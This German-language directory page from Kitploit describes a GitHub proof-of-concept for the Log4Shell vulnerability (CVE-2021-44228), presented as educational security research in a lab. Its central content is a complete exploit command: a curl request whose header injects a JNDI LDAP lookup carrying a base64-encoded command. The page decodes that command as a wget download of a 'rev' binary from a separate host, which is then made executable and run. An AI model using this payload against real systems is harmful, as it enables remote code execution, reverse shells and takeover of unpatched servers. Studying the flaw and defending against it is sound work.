Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
LOG4J-CVE-2021-44228 — Proof-of-concept-Exploit für Log4Shell (CVE-2021-44228) mit LDAP-Server-Einrichtung, Payload-Generierung und Paketerfassungsanalyse für die Sicherheitsforschung zu Bildungszwecken. | Kitploit
Tools/GitHubGitHub/sumitpathania03/log4j-cve-2021-44228
Paket-Sniffing & AnalysePayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlArchived
GitHubsumitpathania03/log4j-cve-2021-44228

LOG4J-CVE-2021-44228

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Proof-of-concept-Exploit für Log4Shell (CVE-2021-44228) mit LDAP-Server-Einrichtung, Payload-Generierung und Paketerfassungsanalyse für die Sicherheitsforschung zu Bildungszwecken.

Repository anzeigen
vor 3 JahrenNoch nicht geprüft

LOG4J-CVE-2021-44228

Log4Shell – auch bekannt als CVE-2021-44228 – ist eine kritische Schwachstelle, die die Remote-Codeausführung in Systemen ermöglicht, die Log4j der Apache Foundation verwenden, einer Open-Source-Java-Bibliothek, die häufig in kommerziellen und Open-Source-Softwareprodukten und -Dienstprogrammen eingesetzt wird.

0_6ImDNNYn_uGlIgog

POC-Analyse

Der anfällige Server läuft auf Port 8080.

Screenshot 2023-04-11 115553

Und der LDAP-Server läuft auf zwei Ports: http 8888 und ldap 1389.

Screenshot 2023-04-11 115631

EXPLOIT-BEFEHL

curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'

{

172.17.0.2:8080 -- IP des anfälligen Servers

172.17.0.1:1389 -- IP des LDAP-Servers

Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==

Entschlüsselter Befehl - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev

}

PAKETANALYSE

PACKETS

flowgraph

WIE WIR IN DEN PAKETEN SEHEN KÖNNEN, SENDET DER SERVER EINE GET-ANFRAGE FÜR EINE KLASSE AN DEN LDAP-SERVER. WENN WIR DIE EXPLOIT-KLASSE ÜBERPRÜFEN, KÖNNEN WIR SEHEN, DASS DER LDAP-SERVER DEN ENTSCHLÜSSELTEN BEFEHL IN DER EXPLOIT-KLASSE SENDET.

EXP_CLASS

Ref

https://github.com/simrotion13/log4shell-vulnerable-app

https://github.com/black9/Log4shell_JNDIExploit.git

Tool herunterladen